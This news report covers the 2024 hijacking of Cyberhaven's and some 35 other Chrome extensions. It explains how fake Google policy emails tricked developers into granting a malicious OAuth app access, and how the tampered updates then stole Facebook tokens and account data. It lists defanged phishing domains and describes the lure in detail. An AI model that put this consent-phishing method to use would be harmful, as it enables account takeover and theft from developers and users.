At the end of December 2024 Chrome extension from the Swiss security startup Cyberhaven and at least four other extensions suffered from attacks by unknown hackers. At the time, Cyberhaven experts wrote that the attackers could have stolen confidential user data, including cookies and other people's sessions.
As it has become known now, the scale of the attack was slightly wider. According to the latest data, developers of at least 36 extensions used by over 2,600,000 people suffered from similar hacks.
According to the messages of the affected developers, the malicious campaign began on December 5, 2024. However, the researchers concluded that the attackers' control domains existed as early as March 2024.
It turned out that the attacks on developers began with phishing emails in which the attackers used domains such as supportchromestore(.)com, forextensions(.)com and chromeforextension(.)com.
The emails were framed as being from Google, claiming that the extension violated Chrome Web Store policies and would soon be removed from the store. Developers were told that their product descriptions were misleading and that they now had to agree to Chrome Web Store policies.
If the developer clicked the Go To Policy button embedded in the email to understand what policies they had violated, they were taken to a legitimate Google login page for a malicious OAuth app. This page is part of Google's standard authorization process and is designed to grant third-party apps permission to access certain account resources.
The attackers hosted a malicious OAuth app on the platform called Privacy Policy Extension, which asked the victim to grant permission to manage extensions in the Chrome Web Store through their account.
Multi-factor authentication (MFA) did not help protect the accounts, as it does not require direct approval, and using OAuth assumes that the person fully understands the scope of the permissions they are granting and the potential consequences.
“Our employee followed standard process and inadvertently authorized a malicious third-party application,” explains a report on the attack published by Cyberhaven. “The employee had Google Advanced Protection enabled and MFA was enabled on his account. However, the employee did not receive MFA prompts. The employee’s Google credentials were not compromised.”
After gaining access to the developer’s account, the attackers modified the extension by injecting two malicious files (worker.js and content.js) that contained code to steal Facebook account data * . The hacked extension was then published to the Chrome Web Store as a new version.
According to Extension Total, 36 extensions fell victim to such attacks, but indicators of compromise indicate that more developers may have been affected.
The malicious code injected into the extensions reportedly sought to obtain the extension user's Facebook ID, access token, account information, advertising account information, and business account information. The malicious code also added a listener for click events specifically for Facebook and looked for QR code images related to two-factor authentication or CAPTCHA. All the information stolen in this way was eventually transmitted to the hackers' command and control server.